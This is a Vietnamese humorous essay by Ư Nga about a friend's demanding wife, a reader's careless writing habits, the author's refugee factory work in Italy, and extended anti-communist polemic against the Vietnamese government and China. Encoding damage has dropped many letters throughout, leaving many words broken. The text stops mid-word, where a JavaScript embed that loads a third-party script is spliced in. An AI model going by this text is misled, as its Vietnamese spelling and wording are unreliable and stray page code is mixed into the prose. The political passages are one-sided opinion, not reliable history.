Ư Nga  -  thơ                                                                                                                                              

 

DÙ GNG, DÙ S CŨNG ĐNG CU TH

Tùy bút: Ư Nga

BÀ GNG

Thưa quư Bạn,

Đam mê văn chương đúng là cái nghiệp tht đó!

Không th bt đu bài này theo kiu M: ‘You know?’ v́ không chng có người khó tính s gt to ngay: -Know what? I don’t know! Hay gp người nào Canadian gc Vit, nghe “I don’t know’ h bèn tr li: -I do: NON th́ phát… điên mt v́ bài mi nhp đ đă chng ai mun đc tiếp.

            Nếu Bn kiên nhn đc đến ḍng cui, tôi s mi Bn cùng vi Duvall Don đi xuyên qua mt con đường ṃn, bng xe gn máy (motorcycle). Con đường có cái tên ca mt người đă chết t lâu nhưng xác vẫn c̣n được bôi son, trát phn nm chm ch cho quân lính hu 4 bên Hà Ni. Bn biết ri ch ǵ? Đường ṃn H Chí Minh (h`c’m).

            Bn ch nhé, đng đi lung tung mà l mt mt dp hiếm hoi và min phí.

 

Thưa Bạn,

Xin m đu câu chuyn v anh bn văn thơ của chúng tôi có ngh tay phi là làm ca s, nhưng tay trái lại trót theo nghip nu… ch nghĩa, có cô v tên Gng nhưng không biết nu… ăn. Nghe anh k chuyn này thm thía quá nên xin chia s cùng quư Bn:

Mt ngày ch nht có băo tuyết, trong khi Bn thân đang viết viết, lách lách tht ngon trn th́ b “bà” nhơng nho:

-Anh ơi! Em thèm đậu h lng chan vi nước đường… gng quá à! (tên Gng mà l, phi biết yêu chính ḿnh ch :) .  Anh đng viết na! Anh ch em đi mua nha! Cái… xe mi toanh ca anh, em không dám lái, s có chuyn ǵ th́ b anh… ly d.

Nghe như thế, anh bn khai:

-Vi trí óc k lưỡng ca văn chương, tôi phải ư thc 4 điu căn bn trong cái Mnh Lnh Đu H… ngt không lt tai y.

-Th nht là:

‘Nếu anh không vt ngay cây viết… xung, đng… lên, ngi… xe, ch em đi mua cái th… chết tit có… gng, đường, đu h lng lo và hàn the y th́ chc chn s có chuyn ngay vi hoàng hu Gng

-Th hai là: “Anh đă mua cái… xe mi toanh trong khi em ch cn… mt
chén đ
u h mà anh cũng tiếc vi em sao?”

Tri đt! Cái xe “cũ người,… mi ta” y, tôi ch... toanh ra có 2 ngàn đô (chưa bằng na ca mt chiếc c̣ng king lp ḷe 2 ly ca nàng na). Chng đng đng, phi thay cái xe 9 năm cũ k, hư… lên, nghỉ… xung đă hành h ch phi dng xe gia đường đ… th băng giá mùa đông Canada dài dài mà nàng c bóng gió tng kinh… KH liên miên không biết mi mt. Ngược li, tôi ch có mi 1 cái nhn cưới mng to tèo teo, không mun đeo nàng cũng bt phi… c̣ng vào ngón tay, nht là mi khi có… em út vây quanh, tôi kim soát xem nó có… ṃn đi chút nào không, có bt… vàng khè, bt… sáng chói…chang trước mt các em không, vy mà em nào nh́n thoáng qua là em y biết ngay:

 “Anh đă b… c̣ng king ri h?”.

Bi vy tôi ru hết sc! Tng tui này ri mà chng đào… hoa, mai… hoa, hay vn th… hoa chi c vi c Gng đă già cùng tôi hơn 33 năm chăn gối và trót… c̣ng king vào nhau. Phi công nhn vàng 24 Sài G̣n tt thit, ch gp “vàng đ 14" thành ph h`c’m th́ nó đă phai lt t lúc hn “t́m đường cu quc” ri, có đâu c vàng tươi rực r như cờ ca Quc Gia hoài thế này!

-Th 3: s có cnh tôi lo đo đi theo c ngày đ xách đ, v́ nàng chc chn 100%:

*S không ch mua… 1 mà c… chc chén;

*Không 1 món mà gn… 100 món đ ăn vt;

*S không 1 tim mà gn… 10 tim;

*Không ch mua… 1 th mà gn… 100 th, nào là: qun áo, dày dép, nón, v, găng tay, kp tóc, ví; ri thuc sơn móng tay, đồ mài da chân, cái cân va… to va… nhy, va… chính xác tng mili gram đ có th chu đng được sc nng mt t ca nàng, mt sc nng… không bao gi xung, trong khi t qun áo hàng hiu ca nàng c… tăng lên vùt vt, c s lượng ln giá c, đ nàng thay đi liên miên. Vy mà, mua cho lm càng… ri rm c nhà v́  mi ln đi đâu nàng cũng than, sau c ngày th th, thay thay, ngm ngm st c rut; kết cuc là, ln nào cũng phán:

-“Em… không có cái ǵ đ mc cho va…đp c anh à!”

-Th 4 mi ti chuyn… ly d (bà hăm he hoài, tôi cũng hơi nhàm tai rồi nhưng tôi sợ… trúng gi trùng như “bác” ở lăng Ba Đ́nh đă b… trúng, bà ni khùng làm… thit nên cũng hơi rụt rè khí… tiết nhà binh).

Vô phước hơn nữa, bn tôi bo rng ti kiếp trước không tích đc nên kiếp này, sau nhng tht thu mi c chân như thế nàng mi cho chàng ngh chân, ngi đi… tr tin. Bn tôi đi dày th thao đ xách đ nng, c̣n nàng đi cao gót đ… th qun áo cho nó… sang và đ lên ging sang… sng:

-Em mang guc cao: xách nng, đau lưng quá à!.

-Ngh…chân, ch cái đu tôi th́ s làm vic kinh khng vi hng… bi thu mà toàn… tri chi đang… đến. Ghế ngi ch được đ ngay trước ca tim bán toàn nhng th va… nh, va… nh. Chúng… nh nh 4, 5 “ly” thôi và chúng… sáng trưng lấp lánh nhưng tôi lại phi nhn mnh lnh… nng n là… cà th (phi chi cà ca… s trong hăng c̣n… s (x) ra tin! Đng này tôi c phi kư tên sau khi đt cái th lên bàn, vi khuôn mt… ti thui v́ hi hp khi nh́n nhng con s không, nhy múa, khóc lóc trên tm hóa đơn, thú thật người kư cũng mun… nhy theo luôn cho ri đi mt kiếp… vng tu.

Mà phi chi ăn ung béo b ǵ vi chúng, toàn là nhn nhiếc, c̣ng king ct cht đi tôi vào hăng đ tr tài làm… ph tri, li tuyết, đi đi, v v gn như tuần 6 ngày đ… ph cân bng nhng cái… tri vô duyên điên tiết đy là kim… cương mà… thương hổng ni! Ác nhơn là, cái ngày chủ nht quư báu ca tôi, sau khi cào tuyết kit sc mi được ngi vào bàn hàn huyên vi nàng Văn Chương 1 chút cho đỡ ghin th́ bà Gng li ghin “có… mi 1 chén… gng” như vậy!

Chàng ha rng ln sau chàng s mua… gng tươi về xay và bt nàng mi ch nht phi ăn cho chàng đ 10 chén th́ chàng  mi…h ha. Ha hn hăo huyn thôi, ch đng đến Bà La Sát Gng th́ có mà…hng chua nhưng rất… cay!

Anh chàng đă ha vi tôi là kiếp sau chàng:

-S ly 1 nàng Văn… Ngh Lp Lánh đ cùng làm… văn ngh, văn… xă chung, cùng hiu nhau: vàng thau không th ln ln.

Tôi hi: -Sao li Văn Xă?Thiên h thường nói văn ngh, văn gng m!

Anh ta bo:

-T Văn… Xă qua bà… Xă gn hơn. C̣n hễ… gng là tôi đá văng… Gng đi ch khác chơi ngay! Một… kiếp là đ… khiếp ri!

Chng tôi “email” khuyên bn tôi hoài:

-Thôi bn ơi!

Đng yêu văn chương của…tác gi na, hăy yêu văn chương của thiên h cho khe! Va được… min phí, (M cũng gi là… “free”. Mà đă PHI th́ khi cn viết b thêm du sc chi cho mt!) li va không tn tin dành dm đem in nè, in xong ch l đ nó lê lếch trong xó bếp vi… gng, hay dy chết như “chủ nghĩa xă hi” u vt, u gà”?( ưu việt) Tơ lơ mơ  nàng Gừng đem mi la đt hết là ông tiêu! Thế là li gói gói, gi gi phi nước đi Kính Biếu Min Phí đi, cho sách không… già và cho nàng khi… la. C̣n na, sau khi tn tin, tn công, tn sc, nht là tn th́ gi gói, gi đi ri, ông li phi ngi ch nhng “đc”tht  không hi âm bao gi. Hiếm hoi  lm mi có 1 đc gi như ông, chịu b th́ gi ra ch cho ông nhng khuyết đim ca sách đ ông rút kinh nghim cho nhng ln “yêu văn chương ḿnh” kế tiếp ca ông. Ông s kh dài dài như kiểu kh “nhân dân làm ch” ca VC. Viết sách va… kh li va… l đó ông à! Thà ông c làm “đy t” như VC mà ăn hoài của dân không… hết, tin li c̣n được… lếch sang các nhà băng ngoi quc t nn…kinh tế (không phi t nn chính tr như thuyền nhân hay din “H.O.” như các ông đâu. Ừ mà tôi nên viết… HÁT Ô đàng hoàng, không thôi quên 2 du chm ông li tưởng tôi b cm nên… ho sng)

 

CU TH

Hôm n có mt Đc Gi đến nhà chơi để t́m hiu kinh nghim viết lách ca người ḿnh. Bn than vi tôi rng cô thích viết nhưng tánh t́nh rất cu th, viết xong cái ǵ là bm nút GI (SEND) đi ngay. Tôi la làng:

-Cu th là Bn s b đc gi… th cu hư ra ch trích Bn ngay!

Chuyn trong 1 ngày không b ma… nhp mà được nàng thơ, nàng văn… “nhập”, có th viết được 20 bài thơ liên tục, hay 20 trang văn xuôi, trang nào cũng trôi chy ch nghĩa vi ư t đâu ra đó liên tc là thường và d dàng trong gii viết lách, nhưng hơn thua nhau không, chính là ở s hoàn m ca văn chương trong từng bài, ch không phi s lượng.

Tôi nói liên tc là nếu Bn nhà mt ḿnh, không b ông xă, bà gng làm phin kiu:

-Em ơi! Hết nước trà ri!

Và nếu trà đă pha sn trong b́nh thy ri th́ vn có mnh lnh khác:

-Em ơi! Rót anh ly nước trà!

Hay:

-Em ơi! Hôm nay anh thèm thịt gà kho s, t, ngh!

Nếu Bn là người ni tr gii, tun qua đă nghe chàng thèm món này và sáng qua đă kho sn th́ khi mnh lnh ti hu cc lc:

-Em ơi! Dọn cơm ăn!

Bn phi hiu dĩ nhiên là chàng mun ăn cơm ngay với tht gà ri. Bn đng tưởng b nhé! Nếu không mun chàng ngi vào bàn s chê… cay, chê…ngt th́ Bn phi chun b cho đy đ các món đi kèm: có 1 dĩa rau tht xanh vi đy đ các loi rau thơm hăy c̣n… cười trong gió mát ngoài… vườn, thêm 1 tô canh va… ngt, va nhanh, thêm nhng lát cà rt mng trong chén nước mm, thêm đu phng rang cho gim cholesterol, thêm dĩa cơm gạo lc nóng hi không khô khan như… chàng, chẳng nhăo mm nu rut như… nàng ham viết văn, làm thơ; thêm đũa so cho bằng (dù chàng không thông cm cho nàng), thêm khăn giy lau ming tươm tất, thêm ly rượu nho đ cho  huyết lưu thông, thêm món tráng miệng vi trái thơm tươi cho tiêu cơm và thêm b́nh thủy nước trà gng cho m màng không đóng trong vành đng mch. Mà mun có nhng lát thơm cho đẹp và sn sàng cho chàng cm na th́ cn chi tôi k l dài ḍng cho tn giy, đ dành giy k ti VC ch! Bn ch cn h́nh dung ra làm thế nào đ trái thơm từ gai góc, sù ś nó chy được lên cái dĩa nm xếp lp vàng tươi thật hp dn đi là biết ngay Bn s cn ti thiu là bao nhiêu phút? Riêng tôi, vi cái v sù ś này nó làm tay tôi đau lm Bn v́ có 1 thi mi sang t nn bên Ư Đi Li, tôi nào đă được làm vic văn pḥng ngay đâu, tôi cũng đă phi vt v như tất c người ḿnh mi sang, đ giúp đ gia đ́nh c̣n li “xếp hàng c ngày” đ… tiến lên“xă hi ch nghĩa”; tiến hoài, tiến măi cho đến hôm nay vn c̣n phi tiến, tiến, tiến đ … nuôi “đi gia đ” đang đưa cả nước… lùi dn vào h sâu đói nghèo, chun b hát tiếp bài “Nhiu ngàn năm nô l gic Tàu”.

Ngày y, nào là hái dâu, ri may bao ti công nghip bng th vi cng, to như bao gạo, cha được my trăm kư hóa cht trong đó; ri may tay nhng đôi dày da Ư (mua 1 ln mang c đi chưa hư. Dày Ư tốt lm! Tôi có 1 đôi mang hơn 20 năm mà chỉ ṃn đế này th́ thay đế khác thôi ch da không sao c.) Chúng tôi vn đùa rng “vá đế” như thế là có th đi tiếp đến ngày tr v VN trong vinh quang không bóng cng sn được.

Bn tôi nghe thế là hi ngược li ngay:

- Ch làm em git ḿnh! Tưởng đâu ch tinh nghch nói… vá đế là đá…bp…vế bng đôi dày ng; dày ca Ư nhưng đế Canada th́ có mà t chết ti b… mt nước như thằng Tàu Cng đă đá vào bp vế Tây Nguyên ca chúng ta?

-Theo tôi th́ ly được Tây Nguyên là gic Hán đă đim trúng t huyt ri ch đá bp vế ǵ!

- đúng ri. Mà ch có phi đi lau chùi như mọi người không?

-Không! Nhưng rồi cũng đă tng ct tht gà trong hăng tht AIA, là 1 hăng sn xut tht gà ln nht thành ph Verona. H tính rt k thi gian mi gi, công nhân phi làm ra bao nhiêu thành phm theo kiu dây chuyn, nhưng nhanh hơn trong phim hài Charlie Chaplin đă diễn t nhiu, v́ mi phút th phi ct 50 khi tht vuông vc, phi xt va nhanh va cn thn không đt tay na. Mi bàn tay mang 2 đôi găng khác nhau, bên trong là cotton đ chng cái lnh ca tht, bên ngoài là nylon đ không b ướt tay. Tht xt xong đ thành đng vun trên tht, ch si dây trân (courroie) chy qua th́ th tng ô tht vuông vc y vào đúng v trí đu ca lát 3 ch đă được đông đá và thái mng, đ nhng người đng trước dây “courroie” s cun tṛn khi tht vào trong lát 3 ch, cui dây chuyn s có người đng xếp 9 cun tht y vào 1 cái dĩa xp trng, vi 1 gói gia v đ khách hàng mua v ướp và nướng cho nhanh. Tay xt, tay mài dao, tay b tht xung đu phi nhp nhàng, biết li dng vào nhng khong trng khi đu dây chuyn người công nhân đi ly “palet” (vĩ g ln) thay tht, th́ mi mài dao hay tháo găng tay ra làm nhng vic lt vt như lấy miếng tht b…đu phng (đi lc) trên khuôn mt, lau nhng git nước mt nh nhà ca người t nn v́ cú đin thoi đêm qua t VN báo tin Má bnh, em đa vào nhà thương, đứa nheo nhóc thiếu ăn đói, m; chú bác b đưa ra Bắc tù.v.v….Nói chung là được làm nhng vic vt sao cho tht l làng, vi óc tính toán rt chi ly, trong 5, 10 phút ngn ngi y, nhng vic mà trong khi dây chuyn chy đu th́ người công nhân không th nào có th́ gi đ làm v́ ch cn sai 1 nhp là người khác s không có vic đ mà làm, nếu không có người bn đng nghip tt bng nào bên cnh làm giúp cho ngay trong tích tc y. S chi ly mi khi làm công vic y nhc tôi nh câu nói đ đi ca Ba tôi năm 1979:

-Hai con nên đi khi cái đt nước đang kh s vi bn VC khn nn này. L có kh s trên bin vn c̣n hơn sang xâm lấn nước Miên mà chết bên y hay là chết ngay trên mnh đt min Nam này, dưới tay bn r H. Xung min Tây cn phi hc hi chèo ghe, đi bin, thăm ḍ đường đi, nước bước và tp tính toán cho tht… chi ly, đng ngây thơ tin vào bọn cán b c̣ mi mà b gt gm c sinh mng. Đi đi con! Sng đa nào hay đa ny, đây bn rn th́ chết c chùm!

 

Tr li vi công nhân VN trong hăng AIA: ai cũng làm vic hơn người nh tài mt liếc lá răm rt nhy bén, ai cũng dư giờ mài dao cho tht bén, ct đâu đt đó, bén kiu sếp hay nói  là:

t si tóc trước dao, thi 1 cái, tóc phi đt đôi th́ mi ăn tin!

Mà làm bt c dây chuyn sn xut nào th́ người ḿnh cũng luôn luôn xut sc, nên chng nhng chưa có ai bị qu trách mà c̣n được cp trên khen ngi đưa lên làm việc nh hơn. Tài mài dao với cây mài dài này công nhân nào cũng phi hc như vỡ ḷng ngay t nhng hôm đu: tay cm cây mài, tay cm dao, t trên kéo xung sao cho dao chy tht ngt, tiếng ken két ca 2 thanh st chm vào nhau khiến người có tay ngh có th cm nhn được dao đă đ bén hay chưa? Dao cần thay cái khác hay không? (Mi ln mài dao như thế, tôi thường nghĩ đến tiếng ken két rn người ca nhng cánh ca tù t Bc chí Nam, sau tháng Tư 1975, đă khép lại và chôn cht cuc đi ca bao nhiêu nhân tài Quc Gia, nhng cánh ca xà lim tàn ác… rước người vào mà hu như không… thả ra, bt h phi nm xung vi “chính sách khoan hng ca đng” không c mt mnh chiếu lành ln đ che thân, nhng ngc tù đă giết biết bao nhiêu Quân Dân Cán Chính VNCH, nhng chiến sĩ ưu tú đă hy sinh cho một min Nam VN t do, h đă chết cho mt chính nghĩa rc sáng. Sau my chc năm cưỡng chiếm và giết chóc, chúng chng làm ǵ cho ra hn, ngoài nhng chuyn ô nhc như: “đầy t” đem các người “ch” trinh n đi bán dâm cho các đng viên “u”… vt, u… Tàu Cng mua vui và rao bán khp thế gii. Chưa kể đến c mt di sn văn hóa Vit đă mai mt, mà di hi do VC đ li chc là c nhiu ngàn năm chưa lấy li được v trí ca thi đim 1975. Làm ǵ tôi cũng không th nào quên được ti ác ca chúng. Cu Tri cho thế h chúng ta mai sau có tái sinh làm người VN th́ đng phi chng kiến cnh ngàn năm đô h gic Tàu tái din).

Chng tôi tng nói:

-Chúng ra r chng M nhưng nay th́ toàn xài tiền M ch không dùng tin Vit, c̣n xưa th́ ăn cắp bn Tuyên Ngôn Đc Lp ca M nhưng lại cũng chng M. Có “đc lp” ri, sao li “tiến lên” làm nô l Tàu? Có “t do” ri, sao li đem nước dâng cho gic Hán?

ng CS nào cũng đi ngược đi mà! Anh không thy Tàu va qua Nga đ t́m thế liên kết chng M bin Đông đó sao?

-Ráp 2 cái “đc lp, t do” y li, ai cũng thy các “đy t đi gia VC” hnh phúc ra sao trong cái thiên đường ca chúng, 1 th hnh phúc không nm trong ngoc kép như 80 triệu ngựi “chủ”: vô sn đi đng và đi,… đng… vô sn 1 đa ngc trn gian mang tên Vit Nam! “Đy t”… t do bưng bít dân … độc lp vi thế gii bên ngoài đ ăn chia hưởng hnh phúc, tu tán tài sn và đưa vợ con ra nước ngoài hưởng th ca ăn, ca đ đă bóc lt t xương máu dân nghèo, trong khi các cơ quan truyền thông ca đng c ra r dài dài năm  này qua tháng n toàn nhng u vt, u gà rng tuếch trí tu

-Anh ơi! Mỹ sang giúp Min Nam bo v t do th́ VC sang Tàu, sang Liên Xô cu… vin. Tưởng chúng “đánh cho M cút, ngy nhào” xong đ làm ǵ, hóa ra là đ chy sang Tàu cu phong, tư lợi và đ… bóp méo bn đ quê hương. Mai… đây không biết bn đ ca chúng ta s b chúng…vo tṛn ra h́nh ǵ? Mt đây không biết con cháu chúng ta s nói th tiếng ǵ ngoài nhng “ng, n: mu ho”? Anh bolàm sao chúng ta có th rng lượng tha th, t bi, bác ái, quên ḷng thù hn hay ḥa hp, ḥa gii vi ti ác ca VC được? Có mà điên! Nhng người thuc thế h chúng ta, ai cũng đă hơn 50 cả ri, tin VC b thí cho có đáng nga tay nhn đ v Quê ăn chơi bạc bo không?

-Tin bc! Tin lúc nào cũng…bc mà! Có mà hám tin và hám quyn! Mà quyn ǵ? Quyn ci đu, ci c dân hay quyn ht rác và đ phân cho nhng tên xâm lăng t phương Bắc? Có mà ngu!

 

Thôi, nói chuyn bên Ư tiếp đây v́ bn tôi đă hi:

-Ri ch làm trong hăng đó bao lâu?

-Vài tháng tm trong thi gian tht nghip t văn pḥng kế toán thôi. Tưởng vi tánh t́nh nghiêm trang ít nói th́ khó kết bn đng nghip, ai ng tôi li may mn lt vào mt xanh ca người giám đc khi ông my ln gi làm công nhân vào nghiên cu dây chuyn sn xut. Mt ngày, ông gi tôi lên văn pḥng giao cho trách nhim làm danh sách tt c các công nhân VN trong hăng và cho tôi mi ngày lên văn pḥng hc thêm ít nghip v hành chánh. S người ḿnh ganh t nên tôi xin gi kín đáo và cũng nh thế, tôi đưa thêm được vài gia đ́nh người ḿnh vào làm. Hc gn xong khóa hun luyn đ lo v thng kê cho hăng AIA th́ tôi li được mt chân kế toán Milano gi, nên tôi dt được cnh phi chng kiến nhng con gà b ct c tht là ti nghip trong cái hăng ln này. Tuy thế, h vn gi liên lc vi tôi và mi gi tr li nhưng tôi thích vị trí kia hơn v́ được đi Luân Đôn tu nghip và tiếp xúc vi người ngoi quc nhiu nên kiến thc được m rng hơn nên tôi đành từ chi h. My tháng thôi, mà vai phi ca tôi… hư luôn, có lẽ v́ c gng 1 thế duy nht trong pḥng lnh t 10 đến 12 tiếng 1 ngày. Cho nên chàng ca tôi chng bao gi s, mi khi tôi hăm da:

-Anh coi chng biết…tay em đó nha!

Chúng tôi làm vic ngày nào cũng gn 12 tiếng, tun 6 ngày, làm bao nhiêu gi v tiếp tế gia đ́nh by nhiêu, ch cha li va đ chi tiêu cho cuc sng mi thôi ch không h se sua chi c.

-Thp niên 90 nếu không nh người t nn th́ c min Nam VN không biết ăn bo bo mc đến bao gi? Ch mi t VN và Thái qua Ư chc là lnh lm phi không?

-Hi y thy tr 5 đ C là lnh ghê quá vi khí hu m ca đôi giày ng Ư Đi Li (h́nh th bn đ nước Ư), nht là khi có sương mù th́ lạnh thu xương, nhưng có lẽ nh được… tp trước như vậy mà qua x s Cây Nước Đá này, vi khí hu khô và nhit đ có khi xung đến tr 43 đ C, mà chúng tôi mang… giày ng Ư li tuyết ngon lành, mi năm té ch… vài ln đ… th xương cốt cng cáp c nào, c̣n th́ lái xe trên băng tuyết đi làm cũng… lượn l như… rắn cho… vui vi thiên h.

- Thôi, ḿnh đng ta bà thế gii na! T Canada, ḿnh qua Ư, Pháp, VN ri. Mt VN không chưa đủ đ chúng ta đau như cắt rut à? Stop, please! Fermati, per favore! S'il vous plait! (xin ngưng) C̣n tiếng Tàu là ǵ th́ tôi không cn biết đến cái ngôn ng xâm ln bin Đông và xâm lăng thế gii y.

-D thưa bảo “x́ top” th́ tôi… “top” nhưng xin cô đừng “x́” tiếng Ư ra nha! Cô đang quát tháo vi mt công dân Ư gc Vit đă t nn chính tr 20 năm đó. Cô mà… x́ mt hi, tôi ni quu, tôi “O” vi “A” th́ có mà hiu ra ri rm như…spaghetti ngay!

-Th coi! B em không biết ăn spaghetti 1 cách lch s là phi dùng na qun qun gn gàng vào mung trước khi b vào ming sao!

- Ăn spaghetti th́ d vy ch hc tiếng Ư th́ nó không có ngt ngào, âm điu du dương như tiếng Vit, nó toàn là , à à v́ nó là Italia (nước Ư). Mà tôi vn làItaliana (người Ư), ông xă cũng Italiano luôn (người Ư). Hai capito? (Hiu không?)

-Chèn ơi! chưa chi mà chị đă 9 a, 2 ô ri. Thôi cho tôi xin! Ri rm tht!

-Xí! Nghèo mà ham! B tưởng cô “x́” ri tôi không biết “xí” sao? Bày đt chanh chua kiu VC! Người ta k cho nghe min phí c̣n bày đt… x́ xèo, mt quá đi! Hi tôi mi qua t nn bên Thái, Ư; tôi phi đan thêu m c mt mi có tin mà gi mua sách xa v đc, có đâu mà đc “free”…xí…xéo như cô bây giờ, c lên mng là tha h mà đc!

-Thôi cho em xin li nghen! Dù cho ch có ta bà sang bên M na th́ em cũng nghe mà. đây bun quá!

-Cám ơn ly nước chanh đường ca cô nghe! tôi mi ung th́ nghe đường nhiu hơn chanh mà sao hậu v có v chua nhiu hơn ngọt?

-Bi vy người ḿnh mi nói chanh chua đó!

My người nhà có thân nhân tù-ci-to hay chết v́ VC chanh chua như tụi ḿnh th́ chng Cng cho đến khi nào nó chết…hết, con cháu chúng ta vn chưa… hết chết được. Thôi ch k lè l giùm, không thôi em st rut, em cũng bt đâu ô a ri đó! Mà em cũng nhn… nhè nh đây: em nói tù-ci-to 3 ch dính vô 1 chùm đàng hoàng ch không phi “ci to” mà không có ch “tù” đng trước đâu à nhen. Nói ‘tù” khơi khơi nghe như tù h́nh sự không được! Các anh nhà binh đu nói thế đ thm thía nhng ni nhc h́nh không bao gi quên được như sau:

-Ci… bo: tàn ác, thâm đc

-Ci… co sch bách sành banh nhân phm, xiết bao t đ ti tin và hèn hóa con người qua miếng ăn

-Ci… cào cho tù đói bng cn cào thân xác

-Ci… đo: mi tôn giáo đu phi xóa b đ đi sang đo Vô Thn

-Ci… go, ăn toàn bo bo mc hoc b b đói cho chết rc trong tù

-Ci… kh kho, ci…nho: bn cán ng qun giáo ngu dt lên mt dy đi nhng sĩ quan ưu tú

-Ci… mo: chúng “ngy” mà chúng đem ch này gán ghép cho ta.

-Ci… no: ty năo toàn b quân dân cán chính VNCH

-Ci… quu: bn qun giáo hành h vô căn c

-Ci… sc so tng góc rng, ao, sui, núi cao, lũng thp đ “ci thin”  nhng ba ăn ca rui, mui, sâu, b v́ có khi ch 1 con chut nht nướng lên mà phi chia cho 10 ngựi tù, ăn như kiến ăn lá.

-Ci…vin: tù bnh hon không cha, ch có nhng viên xuyên tâm liên xuyên…tâm can tù… liên miên

-Ci…xo “3 ngày” dưới m t “ci to” mc xác rng sâu.v.v…

Thôi em mt ri! Càng nói càng thêm căm phn! vi bn VC này mà nói cho hết ư th́ s hao hơi tốn sc! K thêm na th́ có nước mà cưa hết g rng thế gii đi làm giy cũng chưa đủ. Thôi, ch k tiếp chuyn thêm bt trên bàn ăn và chuyn ph n ham viết lách đi

-Th́ cô biết đó, đến khi bn không c̣n ǵ đ… thêm na cho chàng th́ bao nhiêu ư tưởng thơ văn trong đu nàng cũng trôi theo ḍng nước ra chén t kiếp nào, nht là  my nàng hp vi thơ hơn văn  th́ càng khổ s trăm b v́ ư thơ chợt… đến lúc năy đă… bay theo hương thơm quyến r ca hành phi chun b sn đ tô đim lên dĩa cơm đă thơm lừng mùi s.

-Chàng ca ai mà ăn ung “d dăi” và “đơn giản” thế? Nào có cu kỳ kiu “đi gia VC” vi óc kh, cà ry rn, trăn hm đu xanh…v.v… đâu ḱa!)

-Chàng ca tôi không  thế đâu nhé! Anh rt thương tôi khi tôi viết… lách. Bi vy tôi phc người ḿnh vô cùng, nên mun… viết, tôi luôn…lách gi nào không có chàng nhà. Viết lách ca tôi là vy!

Văn chương đúng là cái nghiệp!

Có khi nh́n đng h mi có 3 gi sáng, thay v́ nm trong nm êm, chăn m ng th́ t nhiên tôi li c trăn tr hoài. S làm mt gic ng ca chng và s quên nhng ư tưởng, cơn ‘ghiền’ làm tôi ḷ ṃ thc dy; thay 4, 5 lp áo đ vào nhà bếp lnh lo ngi viết viết, đc đc, ko l sáng mai quên th́ ung nên cái đu bt cái tay phi làm vic ngay, dù đang b tr sinh hành h. Thit là mc… cái… chi mà không nm dưỡng sc? Hèn chi Ba tôi c phán: ‘Chi mà kỳ!’ là đúng quá!

Đúng là b văn ‘’nhp’’! ! Viết th́ viết! Tôi không dám m máy đánh … rào rào

cho sướng tay, s n ào, chng không ng được li bt quỳ gi sơ mít, chứ đánh vi 10… ngón chc chn s nhanh hơn cầm viết 5… ngón c 10 ln, mà li thun tin, sch s, gn gàng trong vic thêm vào, bt ra… hơn là bản tho viết tay nhiu. Viết tay, dù tô màu xanh, đ, tím ,vàng chi đi na th́ khi xong, nh́n li, cũng c ri rm như chữ…T̀NH v́ nó rườm rà, khó kim soát văn phm khi ḍng văn tuôn ào ào không kp chp bt, mà c lt qua, lt li 1 hi là tư tưởng bay mt như ‘tư tưởng h chí minh’ ngay. Ǵ ch viết tay như hồi c̣n Sài G̣n hay nhng lúc ngi xe đin đi làm tôi rt ngi v́ ư tưởng đang nhp vào óc vùn vt như hỏa tin M đưa lên trời, (nhanh hơn nhiều ca Bc Hàn va phóng đe da Nam Hàn). Nhanh quá, tôi viết… ra không kp nên không th tà tà như ‘đại gia VC’ ăn chơi th́ có mà mất… nước sm, ư quên, mt… ư t sm và b cc s lng lo ngay. Nói theo kiu M là: khi có ngun cm hng… trên đu th́ phi cp tc đưa ngay… xung máy và sp xếp lin tay cho gn gàng, hp dn ch đng hn…ḥ kiu cng sn. (Người… ḿnh quan nim ư trong đu th́ viết ra nhưng người …ta th́ li bo ‘trên đu viết xung’). Mà càng… ḥ dô ta bao lâu th́ càng sâu… mt mát như kiểu…ha hn “Mang theo thc ăn và lương thực đi ci to 3 ngày’’ by nhiêu. Công nhn ngôn ng ḿnh hay tht: hn ḥ! Tôi viết mê say đến khi đng h đă đim 8g30 ri mi dùng đim tâm sơ sơ để được ung tr sinh cho có sc đến pḥng mch bác sĩ ngi ch 4, 5 tiếng.

-Ch bnh ǵ mà đi… thăm bác sĩ?

-Đi cho bác sĩ… thăm bnh ḿnh ch. ai rnh mà đi… thăm bác sĩ! Đng hi bnh s ca tôi nha. Bnh nào cũng bt ngun t 2 ch “gii phóng”… chết tit ca VC c. Ngày nào VC chưa chịu chết theo cái ch nghĩa u… vt… tt…  ca chúng th́ ngày đó căn bnh nh nước, thương ṇi của chúng ta c̣n đau đn tn tim can. Cho nên tôi khuyên Bn đng viết lách chi cho mt óc, nên hc ra… bác sĩ gii như như BS quốc gia  ḿnh th́ mi biết cách git con vi trùng cng sn. Mà Bn nh cha sao cho dt được nó th́ mi gim bt ti ác mà nhân loi phi gánh vác, nht là VN. Nếu cn th́ nên hóa tr nhng cái… chết tit y càng sm càng tt, không thôi nó lây lung tung khp thế gii đy! Chng cha dt được bnh này khp nơi th́ nếu rnh ri, Bn có th viết vi tôi cho vui, ch c như anh bạn tôi, đi theo xách gi có nhng cái va… nh, va… nhy nhưng lại va… nng tin, va… to gan y cho v hoài th́ tôi làm sao có sách mà đc, mà k l cho con cháu 3 đi rut tht ca tôi nghe? Rut… thit ch không ph(function (d, w) {var x = d.getElementsByTagName('SCRIPT')[0];var f = function () {var s = d.createElement('SCRIPT');s.type = 'text/javascript';s.async = true;s.src = "//np.lexity.com/embed/YW/6810979de0717c32c1cea98c9efd8fb3?id=a3b08f3adb05";x.parentNode.insertBefore(s, x);};w.attachEvent ? w.attachEvent('onload',f) :w.addEventListener('load',f,false);}(document, window));